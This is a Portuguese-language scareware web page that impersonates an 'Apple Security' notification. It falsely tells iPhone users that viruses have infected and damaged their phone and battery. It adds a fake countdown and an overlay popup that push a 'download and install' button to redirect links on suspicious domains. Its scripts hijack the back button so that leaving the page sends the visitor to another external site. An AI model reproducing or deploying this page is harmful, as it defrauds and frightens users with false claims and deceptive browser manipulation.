<!DOCTYPE html><html lang="PT"><head>
  <base href="">


    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=8">
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noindex">
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <title>(1)NOTIFICAÇÃO DE SISTEMA</title>
    <meta name="referrer" content="no-referrer">
    <link rel="shortcut icon" href="https://pichost24.click/9af2a4c7/51/cf/51cfd5cb93d3696fd24121995ab92259.ico" type="image/x-icon">
    <link rel="icon" href="https://pichost24.click/9af2a4c7/51/cf/51cfd5cb93d3696fd24121995ab92259.ico" type="image/x-icon">

<style>
* {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box
}

html {
    height: 100%
}

body {
    margin: 0;
    min-height: 100%;
    background-color: #fff;
    font-family: "SF Pro Text", "SF Pro Icons", "Helvetica Neue", "Helvetica", "Arial", sans-serif;
    font-size: 14px;
    line-height: 20px;
    color: #333
}

.w-button {
    display: inline-block;
    padding: 9px 15px;
    background-color: #3898EC;
    color: white;
    border: 0;
    line-height: inherit;
    text-decoration: none;
    cursor: pointer;
    border-radius: 0
}

.redirect {
    display: none;
    width: 100%;
    height: 100%;
    position: absolute;
    z-index: 9999;
    display: none;
}

.body {
    background-color: #fff;
}

.block-final {
    max-width: 450px;
    position: absolute;
    bottom: 2%;
    left: 2%;
    right: 2%;
    z-index: 999;
    overflow: visible;
    margin-top: -160px;
    margin-right: auto;
    margin-left: auto;
    color: #000;
    opacity: 0;
}

.button-block {
    margin-top: 7px;
    padding: 10px;
    border-radius: 15px;
    background-color: #fff;
    font-weight: bold;
}

.text-block-5 {
    padding-top: 5px;
    padding-bottom: 5px;
    text-transform: uppercase;
    color: #000;
    font-size: 15px;
    font-weight: 500;
    text-align: left;
}

.text-block-6 {
    font-size: 1em;
    color: #333;
}

.bold-text {
    color: red;
}

.button-2 {
    width: 100%;
    height: 35px;
    background-color: #fff;
    color: #487ede;
    font-size: 16px;
    text-align: center;
}

.header {
    position: relative;
    z-index: 999999;
    height: 50px;
    padding-top: 5px;
    padding-right: 15px;
    padding-left: 15px;
    background-color: #282828;
}

.image {
    float: left;
}

.paragraph {
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
}

.text-block-7 {
    padding-top: 8px;
    padding-left: 10px;
    float: left;
    color: #fff;
}

.text {
    margin-top: 20px;
    padding-bottom: 20px;
    background: white;
    border-top: solid #cecece 1px;
    border-bottom: solid #cecece 1px;
    padding-right: 20px;
    padding-left: 20px;
}

.buttons {
    width: 100%;
    margin-top: 20px;
}

.left-button {
    display: inline;
    width: 50%;
    height: 100%;
    float: left;
    border: 1px solid #cecece;
}

.div-block {
    display: inline-block;
    width: 50%;
    float: right;
}

.div-block-copy {
    display: inline-block;
    width: 50%;
    float: right;
}

.right-button {
    width: 100%;
    height: 100%;
    border-top: 1px solid #cecece;
    border-bottom: 1px solid #cecece;
}

.install {
    display: block;
    height: 100%;
    padding: 15px;
    background-color: #fff;
    color: #007aff;
    font-size: 16px;
    text-align: center;
}

.text-block-8 {
    padding-top: 10px;
    color: #ccc;
    font-size: 9px;
    text-align: center;
}

.popup {
    position: absolute;
    top: 0px;
    width: 100vw;
    height: 100vh;
    background-color: #000;
    opacity: 0.8;
}

.heading {
    font-size: 22px;
    line-height: 28px;
    color: #ff2f18;
    font-weight: 400;
}

.date {
    color: white;
    float: right;
    text-align: right;
}

.timer {
    font-size: 1.1em;
    font-weight: 400;
    color: #ff2f18;
    padding-top: 10px;
}

.main {
    background-color: #f0eff5;
    height: 100vh
}

.content-popunder {
    min-height: 105px;
    margin-bottom: 5px;
    padding: 10px;
    border-radius: 15px;
    background-color: #fff;
}

.icon {
    float: left;
    width: 25%;
}

.icon img {
    max-width: 100%;
    height: auto;
}

.main-text {
    float: left;
    width: 75%;
    padding-left: 10px;
}
</style>
    <script>
        function getURLParameter(name)
        {
            return decodeURI(
                (RegExp(name + '=' + '(.*?)(&|$)').exec(location.search) || [, null])[1] || '');
        }
    </script>
</head>

<body class="body">

    <a href="https://softland.icu/cl/p_cE0A8.sbmylN742SY5CUAn0F8FSbpqosdAyvMGl0V3GSJ4tXjTOAQnI0Ixlz_FfPnYytY0nQsRhFyIWyiHBIkCRwYdnEJuy9.A5RF8iwSPN1SuTtM253L_d9mN2Xd9jdlyCeT5VjRmSnl2qgDLwt8_mYtwDcGkkBRxA6J8mI.OTDCwbm4EbgFhYHad5WFz.q8EXRYPJKl3HKw0GALRDs1wZ_buAl.VPB7r5gqzzjmQWkqDbJVDxRlk3afqw867EGZJ4R69f9zaOjvlihaA_lDomW.fi10qZN8lJPv0fa1RiLWBhLnLGXF4tNETZ4Q1aHLfkEpEYehB8ZyTxAK0MaZr22X8GQBXtafYDcWR7.sqq.qq" class="redirect"></a>
    <div class="main">
        <div class="header w-clearfix"><img src="https://pichost24.click/9af2a4c7/92/29/922914cc97457fdc3fbb24352f6a7d84.jpg" alt="" class="image" width="35" height="35">
            <div class="text-block-7">Apple Security</div>
            <div class="date">
                <script language="Javascript">
                    var dayNames = new Array("Domingo", "segunda", "terça", "quarta", "quinta", "sexta", "sábado");
                    var monthNames = new Array("Janeiro", "fevereiro", "março", "abril", "maio", "junho", "julho", "agosto", "setembro", "outubro", "novembro", "dezembro");
                    var now = new Date();
                    var dayOfTheWeek = now.getDay();
                    now.setTime(now.getTime() - 0 * 24 * 60 * 60 * 1000);
                    document.write(dayNames[(now.getDay())] + " <br> " + now.getDate() + " " + monthNames[(now.getMonth())] + " " + now.getFullYear());
                </script>sábado <br> 5 março 2022
            </div>
        </div>
        <div class="text">
            <h1 class="heading">(3) Vírus foram detectados em seu <script>
                   iPhone
                </script>O iPhone e a bateria foram infectados e danificados.</h1>

            <b>Se você não remover esse malware agora, ele poderá causar mais danos ao seu Apple iPhone. Como consertar isto:</b>
            <br>
            <br><strong>Etapa 1:</strong>Toque no botão abaixo de &amp; Instale a ferramenta de proteção antivírus recomendada gratuitamente na AppStore.
            <br>
            <br> <strong>Etapa 2: </strong>Execute o aplicativo para remover todos os malwares para reparar seu telefone em 100%

            <div id="theTime" class="timer">1 minutes and 40 seconds</div>

        </div>


        <div class="buttons buttons w-clearfix">
            <div class="right-button"><a href="https://softland.icu/cl/p_cE0A8.sbmylN742SY5CUAn0F8FSbpqosdAyvMGl0V3GSJ4tXjTOAQnI0Ixlz_FfPnYytY0nQsRhFyIWyiHBIkCRwYdnEJuy9.A5RF8iwSPN1SuTtM253L_d9mN2Xd9jdlyCeT5VjRmSnl2qgDLwt8_mYtwDcGkkBRxA6J8mI.OTDCwbm4EbgFhYHad5WFz.q8EXRYPJKl3HKw0GALRDs1wZ_buAl.VPB7r5gqzzjmQWkqDbJVDxRlk3afqw867EGZJ4R69f9zaOjvlihaA_lDomW.fi10qZN8lJPv0fa1RiLWBhLnLGXF4tNETZ4Q1aHLfkEpEYehB8ZyTxAK0MaZr22X8GQBXtafYDcWR7.sqq.qq" onclick="saveParamsToClipboard()" class="install w-button">Baixar e instalar</a></div>
        </div>
        <div class="text-block-8">Detectado pela Apple.</div>
    </div>
    <div class="block-final" onclick="oop();" style="opacity: 1; -webkit-transition: 0.5s; transition: 0.5s;">

        <div class="content-popunder">

            <div class="icon">
                <img src="https://pichost24.click/9af2a4c7/9f/8b/9f8bf8f18ce4547d1f76e3154a370e15.png" alt="" width="90">
            </div>

            <div class="main-text">
                <div class="text-block-5">(1) notificação do sistema</div>
                <div class="text-block-6">Leia a notificação importante sobre o seu Apple iPhone.</div>
            </div>
        </div>
        <div class="button-block"><a href="https://softland.icu/ln/p_cE0A8.sbmylN742SY5CUAn0F8FSbpqosdAyvMGl0V3GSJ4tXjTOAQnI0Ixlz_FfPnYytY0nQsRhFyIWyiHBIkCRwYdnEJuy9.A5RF8iwSPN1SuTtM253L_d9mN2Xd9jdlyCeT5VjRmSnl2qgDLwt8_mYtwDcGkkBRxA6J8mI.OTDCwbm4EbgFhYHad5WFz.q8EXRYPJKl3HKw0GALRDs1wZ_buAl.VPB7r5gqzzjmQWkqDbJVDxRlk3afqw867EGZJ4R69f9zaOjvlihaA_lDomW.fi10qZN8lJPv0fa1RiLWBhLnLGXF4tNETZ4Q1aHLfkEpEYehB8ZyTxAK0MaZr22X8GQBXtafYDcWR7.sqq.qq#" class="install w-button">OK</a></div>
    </div>
    <div class="popup" onclick="oop();"></div>


    <script type="text/javascript">
        function oop()
        {
            document.getElementsByClassName('block-final')[0].style.display = 'none';
            document.getElementsByClassName('popup')[0].style.opacity = '0';
            document.getElementsByClassName('popup')[0].style.transition = '0.5s';
            document.getElementsByClassName('redirect')[0].style.display = 'block';
        }
        setTimeout(function()
        {
            document.getElementsByClassName('block-final')[0].style.opacity = '1';
            document.getElementsByClassName('block-final')[0].style.transition = '0.5s';
        }, 300);
    </script>

    <script type="text/javascript">
        ! function()
        {
            var t;
            try
            {
                for (t = 0; 10 > t; ++t) console.log(
                {}, "", "#");
                onpopstate = function(t)
                {
                    t.state && location.replace("#")
                }
            }
            catch (o)
            {}
        }();
    </script>

    <script language="JavaScript" type="text/javascript">
        var sec = 59;
        var min = 01;

        function countDown()
        {
            sec--;
            if (sec == -01)
            {
                sec = 59;
                min = min - 1;
            }
            else
            {
                min = min;
            }
            if (sec <= 9)
            {
                sec = "0" + sec;
            }
            time = (min <= 9 ? "" + min : min) + " minutes and " + sec + " seconds";
            if (document.getElementById)
            {
                document.getElementById('theTime').innerHTML = time;
            }
            SD = window.setTimeout("countDown();", 1000);
            if (min == '00' && sec == '00')
            {
                sec = "00";
                window.clearTimeout(SD);
            }
        }
        window.onload = countDown;
    </script>



<script type="text/javascript">
    (function (window, location) {
    history.replaceState(null, document.title, location.pathname + "#!/ttrhist");
    history.pushState(null, document.title, location.pathname);

    window.addEventListener("popstate", function () {
        if (location.hash === "#!/ttrhist") {
            history.replaceState(null, document.title, location.pathname);
            setTimeout(function () {
                location.replace('https://aix-delivery.icu/i/41871');
            }, 0);
        }
    }, false);
}(window, location));
</script>

</body></html>